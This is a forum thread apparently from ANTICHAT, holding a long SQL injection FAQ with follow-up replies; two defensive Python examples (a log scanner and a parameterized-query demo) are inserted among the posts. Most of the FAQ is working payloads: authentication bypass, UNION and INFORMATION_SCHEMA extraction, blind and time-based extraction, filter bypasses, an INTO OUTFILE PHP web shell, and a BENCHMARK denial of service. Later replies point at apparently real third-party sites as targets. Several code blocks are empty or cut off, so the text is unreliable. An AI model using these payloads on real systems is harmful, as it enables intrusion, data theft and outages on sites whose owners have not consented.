Author Articles - SQL Injection Full FAQ - ANTICHAT - Security Online Community
7 Jul 2007 #1
Dr.Z3r0
Leaders of the World
Author: Dr.Z3r0
The article has been moved to rdot.org
Please note: this is the old version of the article, and it will no longer be updated.
0. INTRO
0.1 Introduction
Having roamed the Internet in search of at least some information on SQL injection, you probably often came across articles that were either very short, or unclear, or covered only one topic, or something else, which of course did not suit you. Once, I too collected somewhere around 10-20 articles on this topic in order to get into the many subtleties of this vulnerability. Remembering those times, I decided to write a complete FAQ on this topic so that, so to speak, others would not have to suffer. Those who find that I missed something, made a mistake somewhere, etc., please write below; it is difficult, after all, to keep everything in my head. By the way, this is my first article, so please do not throw tomatoes or kick me.
In general, in my opinion, the best way to learn how to work correctly with SQL
https://forum.antichat.ru/threads/43966/ 1/30
2019/4/14 Author articles - SQL injection full FAQ | ANTICHAT - Security online community
injection is not to read this article but to practice live, for example by writing a vulnerable script yourself or using the one I give at the very end.
By the way, I advise you to read everything, as each item contains something important for the next one, and so on.
One more thing. When reading, please note that this article is from 2007 and is somewhat outdated. Now (April 2010) I am trying to rewrite it to restore its relevance.
Take, for example, the engine of this forum. From the user's side it is all beautiful. Given the subject of the article, you should ask the question: where does the engine get the information (even this very article, these letters)? Right! From the database!
Roughly speaking, a database in the usual sense consists of a set of tables. Each table, of course, has columns and rows. Actually, this is the key point. Take, for example, the table of users of this forum. For each user several parameters need to be described (nickname, e-mail, registration date, etc.). As a result, each column defines some parameter of the users, and each row defines a specific user. And at the intersection of the column and row we need, there will be the information about the parameter of the desired user.
(In general, this is an exaggerated description of relational databases; you can search for the details.)
So, I hope the presentation is clear. Now let's talk about interacting with databases. To work with a database, a special query language, SQL, was developed (by the way, I would advise you to look for a manual on it; it will be useful).
Code:
SELECT product FROM store WHERE (type = 'vodka' AND price = '200') LIMIT 1
Actually, in response to your request (SQL query), you (the script) receive a bottle (information), and the seller (the database) no longer cares what you do with it, since it has done its job. You can drink it, pour it out, give it away (process, output, calculate) and so on.
Let's say you quit drinking. So you decided to go to the store for kefir, and specially wrote on a piece of paper "one packet of kefir for 30 rubles" so as not to forget why you came to the store. But you have an alcoholic friend (a hacker, i.e. an attacker) who corrected the inscription on the piece of paper (carried out an SQL injection attack) to "one packet of kefir for 30 rubles or one bottle of vodka for 200 rubles".
As a result, you come to the store and say, reading from the piece of paper (the incoming parameter): "Give me one packet of kefir for 30 rubles or one bottle of vodka for 200 rubles"
Code:
SELECT product FROM store WHERE (type = 'kefir' AND price = '30') OR (type = 'vodka' AND price = '200') LIMIT 1
The seller, figuring that it is farther to walk to the fridge with the kefir than to the shelf with the vodka, gives you a bottle. And you go home with a clear conscience, where your alcoholic friend is already waiting for you, pleased with the result))
Here is an actual SQL injection example. The point here is the lack of filtering of incoming parameters: you did not notice that the second part of the note was written in different handwriting, did you?
Of course, this is all exaggerated, but I hope you have caught the idea of SQL queries and of injections into these queries.
Last edited: Sep 6, 2011
7 Jul 2007 #2
Dr.Z3r0
Leaders of the World
Having understood this idea, you will understand that it is very easy to find an SQL injection. You need to insert single and double quotes into all fields, variables and cookies.
Let's start with this script: http://xxx/news.php?id=1 . Suppose that the original query to the database looks like this:
Code:
Now we add a quotation mark to the "id" variable, like this: http://xxx/news.php?id=1'
And, if the variable is not filtered, our query to the database will look like this:
Code:
Here we see a violation of the syntax and logic of the SQL query, and as a result the database will not be able to process such a query correctly.
If error reporting is turned off, in this case you can determine the presence of the vulnerability like this (it would also not hurt not to confuse this with paragraph 1.2, as described in that paragraph): http://xxx/news.php?id=1' -- , so that the query to the database will be like this:
Code:
(For those in the tank: "--" is the sign of the beginning of a comment; everything after it is discarded. I also want to draw your attention to the fact that after it there must be a space (this is written in the MySQL documentation), and before it, by the way, too.)
Thus, for MySQL the query remains the same and displays the same as for http://xxx/news.php?id=1
The whole of paragraph 2 is devoted to what to do with this vulnerability.
Let's return to the news script. From the SQL language we must remember that numeric parameters may ("may" is the key word, since nothing prevents the programmer from using the parameter with quotes) be left without quotes, that is, with such a call to the script http://xxx/news.php?id=1 the query to the database can (!) look like this:
Code:
You can also detect this injection by inserting a quote into the 'id' parameter, and then we will see an error message like:
mysql_query(): 1''
1. Quotation filtered
What to do if the same authorization script has no quote check? IMHO it would be at least silly to use this injection to display some information. Let the query to the database be of the form:
Code:
Unfortunately, the password '123' does not fit, but we have found an injection in the 'login' parameter, and in order to log in under the nickname 'Admin' we need to enter something like Admin' -- instead, that is, the part with the password check is discarded and we log in under the name 'Admin'.
Code:
SELECT * FROM users WHERE login = 'Admin' -- ' AND pass = '12
And now what to do if the vulnerability is in the 'pass' field. We enter the following in this field: 123' OR login='Admin' -- . The query will be as follows:
Code:
SELECT * FROM users WHERE login = 'Admin' AND pass = '123' OR login =
Code:
SELECT * FROM users WHERE (login = 'Admin' AND pass = '123') OR (login = 'Admin')
And after these actions we become the full owner of the account with the login 'Admin'.
In SQL there is a LIKE operator. It is used to compare strings. Suppose the query is:
Code:
SELECT * FROM users WHERE login LIKE 'Admin' AND pass LIKE '123'
Even if this script filters the quote, it still remains vulnerable to injection. Instead of the password we just need to enter "%" (for the LIKE operator the "%" character matches any string), and then the query becomes
Code:
SELECT * FROM users WHERE login LIKE 'Admin' AND pass LIKE '%'
and lets us in with the login 'Admin'. In this case we have not only found an SQL injection but also successfully used it.
From here on, only the type of vulnerability described in section 1.1 will be considered; you can adapt the others yourself, it is not difficult.
In a nutshell, it merges two queries into one. And this is very useful, since you can specify almost completely your own query to the database, for example, to display information from any table.
Code:
SELECT * FROM news WHERE id = '1' UNION SELECT 1 -- '
The thing is that the number of columns before and after UNION must match, and an error will probably come out (unless there is exactly one column in the news table):
Used SELECT statements have a different number of columns
In this case we need to find the number of columns (so that their number before and after the UNION matches). We do it like this:
This method is based on finding the number of fields using GROUP BY. That is, a request of this type:
http://xxx/news.php?id=1' GROUP BY 2 --
is displayed without errors if the number of fields is less than or equal to 2.
We make a request of this type:
http://xxx/news.php?id=1' GROUP BY 10 --
Error! So there are fewer than 10 columns. We divide 10 by 2 and make the query
http://xxx/news.php?id=1' GROUP BY 5 --
Oops! No error, which means the number of columns is greater than or equal to 5 but less than 10. Now we take the middle value between 5 and 10; it comes out to about 7. Make the query:
http://xxx/news.php?id=1' GROUP BY 7 --
Error, so it is greater than or equal to 5 but less than 7. Make another request:
http://xxx/news.php?id=1' GROUP BY 6 --
No error... greater than or equal to 6 but less than 7. It follows that the required number of columns is 6.
The same principle as in clause 2.1.1.2, only using ORDER BY. And the error text changes slightly if there are more fields than that:
mysql_query(): Unknown column '10' in 'order clause'
I think that for many of us a page like http://xxx/news.php?id=1 does not suit. So we need to make sure that nothing is output by the first query (before UNION). Roughly speaking, you need to cut off the output of the first query.
The easiest way is to change the "id" from '1' to '-1' (or to '9999999'):
http://xxx/news.php?id=-1' UNION SELECT 1,2,3,4,5,6 --
Now some of these numbers should be displayed somewhere on the page. (For example, since this is conditionally a news script, let's say 3 will be displayed in the "News title", 4 in "News", and so on.) Now, in order to get some information, we need to replace these numbers in the request to the script with the functions we need. If the digits are not displayed anywhere, then most likely there is no output and the remaining subclauses of clause 2.1 can be skipped.
This is the same XSS, only carried out through a query to the database. Example:
http://xxx/news.php?id=-1' UNION SELECT 1,2,3,'<script>alert('SIXSS')</script>',5,6 --
Well, I think it is not difficult to understand that 4 on the page will be replaced by <script>alert('SIXSS')</script> and accordingly exactly the same XSS will result.
If you know the names of the tables and columns in the database, you can skip this item. If you do not know... there are two ways.
2.1.4.1 Names of columns/tables if you have access to INFORMATION_SCHEMA and if the MySQL version >= 5
Well, we found the Users table. Only... ahem... we don't know the columns... Then the INFORMATION_SCHEMA.COLUMNS table comes to the rescue. Its COLUMN_NAME column contains the name of a column in the table TABLE_NAME. This is how we retrieve the column names:
http://xxx/news.php?id=-1' UNION SELECT 1,2,3,COLUMN_NAME,5,6 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='Users' LIMIT 0,1 --
http://xxx/news.php?id=-1' UNION SELECT 1,2,3,COLUMN_NAME,5,6 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='Users' LIMIT 1,1 --
etc.
Unfortunately, here the usual brute force comes into force... Example:
http://xxx/news.php?id=-1' UNION SELECT 1,2,3,4,5,6 FROM Table_name --
Well, suppose we have entered, luckily, Users, the error message disappeared, and the page appears as for http://xxx/news.php?id=-1' UNION SELECT 1,2,3,4,5,6 -- . What does this mean? It means that there is a Users table, and you need to start going through the columns.
http://xxx/news.php?id=-1' UNION SELECT 1,2,3,Column_Name,5,6 FROM Users --
It is necessary to go through Column_Name until an error message of this type disappears:
mysql_query(): Unknown column 'Columnname' in 'field list'
And this is how we learned that the Users table has the login and password columns.
There is in MySQL such an interesting construct as SELECT ... INTO OUTFILE that allows you to write information to a file. Or the SELECT ... INTO DUMPFILE construct, which is almost the same; you can use either.
There are several limitations for it.
But what would prevent us from making a web shell? For example:
http://xxx/news.php?id=-1' UNION SELECT 1,2,3,'<?php eval($_GET['e']) ?>',5,6 INTO OUTFILE '1.php' --
It remains only to find the full path to the root of the site on the server and prepend it to 1.php. In principle, you can find another error in the report that shows the path on the server, or leave it at the root of the server and pick it up through a local connection, but that is another topic.
In most cases it comes to a DoS of the SQL server because nothing else can be done: the tables/columns could not be identified, there are no rights for this or that, etc. I am honestly against this method, but still...
Code:
That is, here this function computes md5(current_time) 100,000 times, which takes about 0.7 seconds on my computer... Something like that... And what if you try nesting BENCHMARK?
Code:
SELECT BENCHMARK(100000, BENCHMARK(100000, md5(current_time)))
It takes a very long time; honestly, I did not even wait... I had to do a reset.
It is enough to hit F5 100 times and "the server will go down fast")))
Last edited: 27 Apr 2010
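Every probe this post walks through (the bare quote, GROUP BY / ORDER BY column counting, UNION SELECT, the INFORMATION_SCHEMA read, INTO OUTFILE, BENCHMARK) leaves a recognizable trace in the web server's access log. The following is an added example and not part of the original post: a small Python scanner over constructed Apache-style log lines. It URL-decodes each query string the way PHP does for $_GET (so "%20" and "+" become spaces), collapses /**/ comments (which the FAQ later notes can stand in for a space), and reports which indicators matched. The log lines, IP addresses and indicator names are constructed for the example.

```python
"""Flag SQL-injection probes of the kinds described in the FAQ in access logs.
Added example: log lines, addresses and indicator names are constructed."""
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed Apache combined-style lines mirroring the FAQ's probes: a bare
# quote, GROUP BY counting, UNION SELECT, an INFORMATION_SCHEMA read, a
# BENCHMARK delay, and one harmless request for contrast.
SAMPLE_LOG = """\
10.0.0.5 - - [07/Jul/2007:12:00:01 +0400] "GET /news.php?id=1 HTTP/1.1" 200 5120
10.0.0.5 - - [07/Jul/2007:12:00:02 +0400] "GET /news.php?id=1' HTTP/1.1" 500 312
10.0.0.5 - - [07/Jul/2007:12:00:03 +0400] "GET /news.php?id=1'%20GROUP%20BY%207%20--%20 HTTP/1.1" 500 312
10.0.0.5 - - [07/Jul/2007:12:00:04 +0400] "GET /news.php?id=-1'%20UNION%20SELECT%201,2,3,4,5,6%20--%20 HTTP/1.1" 200 4870
10.0.0.5 - - [07/Jul/2007:12:00:05 +0400] "GET /news.php?id=-1'%20UNION%20SELECT%201,2,3,COLUMN_NAME,5,6%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20TABLE_NAME='Users'%20LIMIT%200,1%20--%20 HTTP/1.1" 200 4870
10.0.0.5 - - [07/Jul/2007:12:00:06 +0400] "GET /news.php?id=-1'%20OR%20id=IF(101>100,1,BENCHMARK(2999999,MD5(NOW())))%20--%20 HTTP/1.1" 200 5120
10.0.0.9 - - [07/Jul/2007:12:00:07 +0400] "GET /news.php?id=2&by=(id*1) HTTP/1.1" 200 5120
"""

# ip, two ident/user fields, [timestamp], "METHOD target PROTO", status, size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+$'
)

# Indicator name and the pattern it matches in the decoded query string.
INDICATORS = [
    ("quote+comment", re.compile(r"'\s*(--|#|/\*)")),            # id=1' --
    ("union-select",  re.compile(r"\bunion\b\s*(all\s+)?\(?\s*select\b", re.I)),
    ("column-probe",  re.compile(r"\b(group|order)\s+by\s+\d+", re.I)),
    ("schema-read",   re.compile(r"\binformation_schema\b", re.I)),
    ("file-write",    re.compile(r"\binto\s+(out|dump)file\b", re.I)),
    ("time-delay",    re.compile(r"\b(benchmark|sleep)\s*\(", re.I)),
]


def decode_query(target):
    """Return the query string as PHP's $_GET would see it (one URL decode)."""
    return unquote_plus(urlsplit(target).query)


def classify(decoded):
    """List the indicator names found in a decoded query string."""
    # The FAQ notes /**/ can replace a space: collapse such comments first so
    # "UNION/**/SELECT" is seen as "UNION SELECT".
    text = re.sub(r"/\*.*?\*/", " ", decoded)
    return [name for name, rx in INDICATORS if rx.search(text)]


def scan(log_text):
    """Return (ip, path, status, indicators) for every suspicious line."""
    alerts = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        query = decode_query(m["target"])
        hits = classify(query)
        status = int(m["status"])
        # A lone quote that produced a server error is the FAQ's very first
        # probe; it has no keyword, so it is only flagged together with the 5xx.
        if not hits and "'" in query and status >= 500:
            hits = ["quote-error"]
        if hits:
            alerts.append((m["ip"], urlsplit(m["target"]).path, status, hits))
    return alerts


if __name__ == "__main__":
    for ip, path, status, hits in scan(SAMPLE_LOG):
        print(ip, path, status, ",".join(hits))
```

Two things this signature approach does not cover, both on this page: the ORDER BY variant later in the thread (by=(id*IF(...))) carries no SQL keyword and is only caught by whitelisting the allowed values of the sort parameter in the application, and an attacker who sends payloads in POST bodies or cookies (the FAQ says to test all three) will not appear in the request line at all, so the same classifier has to run on application-side input logging.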
7 Jul 2007 #3
Dr.Z3r0
Leaders of the World
The idea of this method is to try to find output in the error report, that is, to dynamically pass an arbitrary substring into a MySQL error.
In general, I see no point in trying to explain the meaning and logic of the query; honestly speaking, I barely figured it out myself)
Code:
SELECT COUNT(*) FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3) x GROUP BY CONCAT(MID(
The disadvantage of this method is the impossibility of outputting a string longer than 63 characters at a time, and of course the need for error report display to be enabled.
As a result of the previous query we will see an error like:
Duplicate entry '5.0.45-community-nt0' for key 1
Keep in mind that the last zero in the line "5.0.45-community-nt0" does not belong to it, but is the result of executing FLOOR(RAND(0)*2), without which it would not be possible to provoke the error. And that is why we output 63 characters instead of the 64 it might initially seem.
Code:
Now we modify it via the vulnerable id parameter into a query like this (if it is unfamiliar, go to step 5 and read):
Code:
SELECT * FROM news WHERE id = '-1' OR id = IF(ASCII((SELECT USER()
What does this give us? To begin with, MySQL performs the SELECT USER() subquery inside the ASCII() function, which returns the ASCII code of the first character of the subquery result, and the IF() function returns 1 if this code is greater than or equal to 100.
Code:
and it is executed in the same way as when accessing the script http://xxx/news.php?id=1, and if the code of this character is less, then the main query becomes
Code:
Let us say, conventionally, that the query returns 1 (yes) or 0 (no), respectively, and begin iterating.
What should we do if there are no displayed fields and error reporting is turned off? The BENCHMARK function will come to our rescue. As written above, this function performs one action several times. Well, so what, you ask... And here is what. Recall that the query
Code:
SELECT BENCHMARK(100000, BENCHMARK(100000, md5(NOW())))
executes for a sooo long time, and based on delays (no, don't be scared, not the delays you just thought of) we will go through some parameter, say the name of the user under which we are connected to the database (the USER() function shows it).
Code:
And now, by analogy with the previous paragraph, we go through the USER() string. Only in this case, instead of 0, the function will execute this query for a very long time, which tells us that the query returned 0, and accordingly, if there is no delay, the query returns 1.
Now let's talk about the delay time. In order to determine the response time for 0 and 1, you must first make several requests:
http://xxx/news.php?id=-1' OR id=IF(99>100,1,BENCHMARK(2999999,MD5(NOW()))) --
will return 0. You need to measure the time. Depending on the bandwidth of your channel, you need to tune the number 2999999 to the current one, so that you can reliably judge whether there was a delay or not compared to
http://xxx/news.php?id=-1' OR id=IF(101>100,1,BENCHMARK(2999999,MD5(NOW()))) --
which will return 1.
ATTENTION! In this case, the main thing is not to forget that after each BENCHMARK execution the SQL server needs to be given some time to rest (slightly more than the BENCHMARK execution itself). Otherwise the results of this search may be incorrect.
In fact, this function creates the delay we need in the web server's response, and note, without unnecessary load on it. That is, SLEEP() is the best alternative to BENCHMARK() and it is desirable to use it, but I repeat the only drawback: this function only appeared in the 5th branch. A fairy tale, nothing less.
I use a value of two to three seconds, but I advise you to choose it according to the server channel, as errors in the output may occur.
This item is written based on the article "New Benchmark Alternative or Effective Blind SQL-injection" by Elekt, respect to him.
This method is based on the fact that instead of returning 0, a subquery is executed which causes an error, and one can judge from the error output that it returned 0, and from the absence of an error that it returned 1. This method will help us if there are no displayed fields but the error report is turned ON (!).
Code:
What do you think this query will return? An error, correct, because id is compared with a subquery that returns two rows.
mysql_query(): Subquery returns more than 1 row
That was the theory. Now on to the query with the help of which we will iterate over the characters:
Code:
SELECT * FROM news WHERE id = '-1' OR id = IF(ASCII(SUBSTRING((SEL
As can be seen from this query, if the character code is greater than or equal to 100, the IF() function returns 1 and then no error occurs, and if not, the function executes the subquery
Code:
which returns two rows, which when compared with id causes an error, and we understand that the query returned 0.
A huge disadvantage of this method is that huge numbers of errors accumulate in the logs. A huge plus is the speed of operation.
For some reason, many have formed the opinion that this is a hopeless case. Well, we will change this opinion to the opposite. Suppose the query to the database looks like this:
Code:
well, as always, the $by variable is not filtered, and a few rows from the database are displayed on the page. Well, we need to get two queries that would somehow change the output on the page, but the queries must be such that we can influence the result with the help of valid subqueries. What can such queries be?
http://xxx/news.php?by=(id*1)
http://xxx/news.php?by=(id*-1)
I hope you guessed that the second time the selection will come out "top to bottom" relative to the first request; it is not difficult to understand why. Suppose the first time this was output, we take it as the truth:
Code:
First news
Second news
Third news
Code:
Third news
Second news
First news
Well then, the query for brute-forcing the name of the current user will look like this:
http://xxx/news.php?by=(id*IF(ASCII(SUBSTRING(USER(),0,1))=112,1,-1))
Well, the news came out in reverse order => false
http://xxx/news.php?by=(id*IF(ASCII(SUBSTRING(USER(),0,1))=113,1,-1))
Again false
Well, for a start, remember that for SQL a construct like /**/ is equal to a space.
Well, what to do if such a construct is filtered? Everything is elementary. You can use brackets and apostrophes. For example:
Code:
SELECT * FROM news WHERE id = '1'UNION(SELECT(1),2,3,4,5,(6)FROM
There is an interesting function CHAR() that returns the character itself given its code. Suppose some character is filtered... well, let it be an asterisk (*). First we need to find out the code of this symbol. In MySQL there is an ASCII() function that returns the code of the leftmost character of the string passed to it, so
Code:
only on the vulnerable host it makes no sense (the '*' symbol is filtered); this needs to be done locally. We learn that the code is 42, and we use the CHAR() function like this
Code:
Another way is to use the hexadecimal character code. Now suppose that the word admin is filtered. In MySQL there is a HEX() function that produces the hexadecimal code of a string. It is used like this
Code:
It will output "61646D696E"; we prepend "0x" (so that SQL understands that it is dealing with hexadecimal encoding) and get "0x61646D696E", to be used without CHAR() like this
Code:
There is an elementary way to put the encoding conversion on MySQL's shoulders. You can use a construct like:
AES_DECRYPT(AES_ENCRYPT([Your request], 'bla'), 'bla')
But! That is kind of no longer fashionable and very cumbersome, and somewhere in the depths of this thread I proposed a different construct a few years ago, a much smaller one:
UNHEX(HEX([Your request]))
I hope that you know SELECT, INSERT, UPDATE, DELETE, DROP; if not, then we go to this book to read: A great reference to the SQL language.
----------------------------
USER() displays the user login under which we are connected to MySQL.
DATABASE() displays the name of the database to which we are connected.
VERSION() displays the MySQL version.
----------------------------
ASCII(str) returns the ASCII code of the first character in the string "str".
CHAR(xx1, xx2, ...) returns a string consisting of the ASCII characters whose codes are xx1, xx2, etc.
HEX(str) returns the hexadecimal equivalent of the string "str".
----------------------------
LENGTH(str) returns the length of the string "str".
SUBSTRING(str, pos [, len]) returns a substring of length len (if not specified, to the end of the string "str") from the string "str", starting at position pos.
LOCATE(substr, str [, pos]) returns the position of the first occurrence of the substring "substr" in the string "str", starting from position pos (if not specified, from the beginning of the string "str"). If the substring "substr" is not present in the string "str", it returns 0.
----------------------------
LOWER(str) converts the string "str" to lower case (in my opinion, Latin only).
CONCAT(param1, param2, ...) is the concatenation of substrings into one string.
CONCAT_WS(sep, param1, param2, ...) is the concatenation of substrings into one string with the separator sep.
----------------------------
IF(exp, ret1, ret2) checks the condition exp; if it is true (not equal to 0) it returns the string ret1, and if not, returns the string ret2.
------------------------------
expr BETWEEN min AND max: if the value of the expression expr is greater than or equal to the specified value min and less than or equal to the specified value max, the
Code:
Code:
2) -- is another form of comment in MySQL. The space after this sign is required. Example:
Code:
3) /* */ is the analogue of the C comment in MySQL. Starting with the 5.1 (?) branch the free ride ends, and this type of comment needs a closing part. For MySQL the space does not matter here. Examples:
Code:
Code:
Displays the login column if the MySQL version is equal to or higher than 3.23.02
You certainly understand that this entire article was written for the sake of this item. All items and their sub-items were written only to make you understand the seriousness of the situation, and the author of this article is not responsible for the use of these items for purposes contrary to the Criminal Code of the Russian Federation.
And the defense is very simple. By the way, all three rules apply to all three methods of transmitting information to the server: GET, POST, Cookie.
2) If the string comparison operator LIKE is used, filter the characters "%" and "_"
------------------------------
3) Do not compare variables without quotes, like SELECT ... WHERE id=$id; use SELECT ... WHERE id='$id' instead and refer to paragraph 1
Last edited: 28 Apr 2010
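The authorization examples from post #2 (Admin' -- in the login field, 123' OR login='Admin' -- in the password field, "%" against LIKE) and the defense rules that close this post, side by side as runnable code. This is an added example and not the FAQ's own script: sqlite3 from the Python standard library stands in for MySQL (its "--" comment and LIKE wildcards behave the same way for these cases), and the users and news tables with their rows are constructed here. Rather than filtering quotes, the hardened functions pass values as query parameters, escape the LIKE wildcards with an ESCAPE clause (rule 2), and accept only a plain integer id (a stricter form of rule 3).

```python
"""The FAQ's vulnerable queries next to hardened versions.
Added example, not the FAQ's script; sqlite3 stands in for MySQL and the
tables, rows and passwords are constructed for the demonstration."""
import sqlite3


def make_db():
    """Constructed schema matching the FAQ: users(login, pass), news(id, title)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users (id INTEGER PRIMARY KEY, login TEXT, pass TEXT);
        INSERT INTO users (login, pass) VALUES ('Admin', 's3cret'), ('vasya', '123');
        CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT);
        INSERT INTO news (title) VALUES ('First news'), ('Second news'), ('Third news');
    """)
    return conn


def login_vulnerable(conn, login, password):
    """The FAQ's authorization query: input pasted straight into the SQL text."""
    sql = "SELECT login FROM users WHERE login = '%s' AND pass = '%s'" % (login, password)
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_like_vulnerable(conn, login, password):
    """'Filters' the quote by doubling it, but LIKE still honours '%' in the input."""
    def quoted(s):
        return s.replace("'", "''")
    sql = "SELECT login FROM users WHERE login LIKE '%s' AND pass LIKE '%s'" % (
        quoted(login), quoted(password))
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(conn, login, password):
    """Parameters travel separately from the SQL text, so a quote or "--" in the
    input is compared as data and never parsed as SQL."""
    sql = "SELECT login FROM users WHERE login = ? AND pass = ?"
    row = conn.execute(sql, (login, password)).fetchone()
    return row[0] if row else None


def escape_like(value, esc="\\"):
    """FAQ rule 2: neutralize the LIKE wildcards '%' and '_' (and the escape char)."""
    return (value.replace(esc, esc + esc)
                 .replace("%", esc + "%")
                 .replace("_", esc + "_"))


def login_like_safe(conn, login, password):
    """Parameters alone do not stop wildcard matching; ESCAPE plus escape_like()
    makes a '%' in the input mean a literal percent sign."""
    sql = ("SELECT login FROM users WHERE login LIKE ? ESCAPE '\\' "
           "AND pass LIKE ? ESCAPE '\\'")
    row = conn.execute(sql, (escape_like(login), escape_like(password))).fetchone()
    return row[0] if row else None


def get_news_vulnerable(conn, raw_id):
    """The FAQ's news.php: a quote in id breaks the statement, and with error
    reporting on, the DBMS message is what the visitor gets to see."""
    sql = "SELECT title FROM news WHERE id = '%s'" % raw_id
    try:
        row = conn.execute(sql).fetchone()
    except sqlite3.OperationalError as exc:
        return "error: %s" % exc
    return row[0] if row else None


def parse_id(raw_id):
    """FAQ rule 3 quotes $id; stricter is to accept only a decimal integer."""
    return int(raw_id) if raw_id.isdigit() else None


def get_news_safe(conn, raw_id):
    """Validate the id, then bind it as a parameter."""
    news_id = parse_id(raw_id)
    if news_id is None:
        return None  # a real application would answer 400 here
    row = conn.execute("SELECT title FROM news WHERE id = ?", (news_id,)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    print("bypass via login field: ", login_vulnerable(db, "Admin' -- ", "wrong"))
    print("bypass via pass field:  ", login_vulnerable(db, "Admin", "123' OR login='Admin' -- "))
    print("same input, parameters: ", login_safe(db, "Admin' -- ", "wrong"))
    print("LIKE with '%':          ", login_like_vulnerable(db, "Admin", "%"))
    print("LIKE escaped:           ", login_like_safe(db, "Admin", "%"))
    print("id=1' with errors on:   ", get_news_vulnerable(db, "1'"))
    print("id=1' validated:        ", get_news_safe(db, "1'"))
```

The login_like_vulnerable case is the one worth staring at: it does exactly what rule 1 of the FAQ asks (the quote is neutralized), and the bypass still works because the hole is in the LIKE semantics, not in the quoting. That is why the hardened LIKE version needs both the parameter binding and the wildcard escaping.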
7 Jul 2007 #4
Dr.Z3r0
Leaders of the World
7. ADDITIONS
Free time turned up... I don't know if anyone needs it at all, but as promised...
Vulnerable script code
Code:
<?php
// Database settings
$script['mysql_server'] = 'localhost'; // Host
$script['mysql_login'] = 'root'; // Login
$script['mysql_password'] = ''; // Password
$script['mysql_db'] = 'test'; // Database name
mysql_select_db($script['mysql_db']) or die('I can not connect to the database');
Base dump
Code:
INSERT INTO `news` VALUES (1, '23/03/07', '12:30', 'Hello vasya :)', 'Well, start
INSERT INTO `news` VALUES (2, '24/03/07', '11:10', 'Gee, and this is for a change
In general, I hope you understand what you need to do with this ...
Code:
$header .= 'Cookie2: $Version=1'."\r\n";
$header .= "Host: ".$set['h']."\r\n\r\n";
$dt = "";
$fp = fsockopen($set['h'], 80);
fwrite($fp, $header);
while (!feof($fp)) $dt .= fread($fp, 1024);
fclose($fp);
Code:
flush();
}
7 Jul 2007 #5
.Slip
Elder - Elder
_Great_ said:
In general, this is not the first article on this topic. They are written with enviable frequency, almost every 2 weeks.
7 Jul 2007 #6
Abra
member
I think the point is that the statement "the most important thing is to filter the quotes" is not right. Not filtering anything at all is not right.
4 Oct 2007 #7
[53x] Shadow
Leaders of Antichat
Update
Addition
@@basedir
@@datadir
@@tmpdir
@@version_compile_os
Query example:
Code:
http://www.site.com/index.php?id
In some cases, if there is a local file inclusion, it is possible to upload a shell through the MySQL logs (as through the Apache logs).
You can often, but not always, determine the OS type through version(): if the returned version string contains
the string "-log", it means a *nix/Linux OS;
the string "-nt" means a Windows-type OS.
4 Nov 2007 #8
HornetBlack
Member
Everything is good in the FAQs, but they do not really cover one question: the variants of the queries used in the scripts. Example:
such a query gives the number of fields
http://www.site.org/article.php?id=3+order+by+4
and this query returns the error
http://www.site.org/article.php?id=3+union+select+1,2,3,4
The used SELECT statements have a different number of columns
In which variant of the query can this happen? I note right away that a quotation mark or parenthesis after the parameter value gives an error.
It is clear that besides the simplest SELECT x FROM t WHERE p='nn' query there can be more complex variants, including ones using brackets. I would like to know the methods by which you can "work out" the structure of the query. Any ideas?
4 Nov 2007 #9
c411k
Members of Antichat
HornetBlack said:
Everything is good in the FAQs, but they do not really cover one question: the variants of the queries used in the scripts. Example:
here such a query gives the number of fields
http://www.site.org/article.php?id=3+order+by+4
and this query returns the error
http://www.site.org/article.php?id=3+union+select+1,2,3,4
The used SELECT statements have a different number of columns
In which variant of the query can this happen? I note right away that a quotation mark or parenthesis after the parameter value gives an error.
It is clear that besides the simplest SELECT x FROM t WHERE p='nn' query there can be more complex variants, including ones using brackets. I would like to know the methods by which you can "work out" the structure of the query. Any ideas?
Put a comment:
order by 4 /*
select 1,2,3,4 /*
4 Nov 2007 #10
Scipio
Members of Antichat
HornetBlack said:
Code:
"select id, name, login, password, description from table where id=".$id.";"
"select id, name, login, password from table where id=".$id.";"
Code:
"select id, name, login, password, description from table where id=-1 order by 4 /*
"select id, name, login, password from table where id=-1 order by 4 /*
then this error will be thrown by the second query...
4 Nov 2007 #11
HornetBlack
Member
Scipio said:
The idea is clear, but... is combining queries through ";" even allowed in MySQL?
However, this is a special case of trouble, so I would really like to see in some FAQ an analysis of possible query constructions in scripts and injection options.
4 Nov 2007 #12
ENFIX
Elder - Elder
Scipio
Members of Antichat
HornetBlack said:
The idea is clear, but... is combining queries through ";" even allowed in MySQL?
However, this is a special case of trouble, so I would really like to see in some FAQ an analysis of possible query constructions in scripts and injection options.
I simply gave an example, a theoretical one so to speak, for better understanding, so that you would not have to bother with the language syntax as well.
HornetBlack
Member
Scipio said:
That's just the trouble: the FAQs copy from one another, but I would like to see more real examples of solving such puzzles.
If anyone is interested, they can dig into this example and propose solutions
http://www.soaw.org./article.php?id=322
Here is another puzzle:
http://www.remhq.com/news_story.php?id=593
17 fields, but it does not let you find out the SQL version: the version, user, database functions seem to be filtered, but there is XSS in the fields
Scipio
Members of Antichat
HornetBlack said:
That's just the trouble: the FAQs copy from one another, but I would like to see more real examples of solving such puzzles.
If anyone is interested, they can dig into this example and propose solutions
http://www.soaw.org./article.php?id=322
Here is another puzzle:
http://www.remhq.com/news_story.php?id=593
17 fields, but it does not let you find out the SQL version: the version, user, database functions seem to be filtered, but there is XSS in the fields
Well, without elementary SQL knowledge no FAQ will help; here you need your own approach, and you need to think a little....
No. 1 is roughly what I was telling you about; subqueries will help here
Code:
http://www.remhq.com/news_story.php?id=555592'%20union%20select%201,2,aes_decrypt(aes_encr
beerhack
Elder - Elder
I-I()/Ib said:
AES_DECRYPT(AES_ENCRYPT('строка'),'bla'),'bla')
Dr.Z3r0
Leaders of the World
beerhack said:
Code:
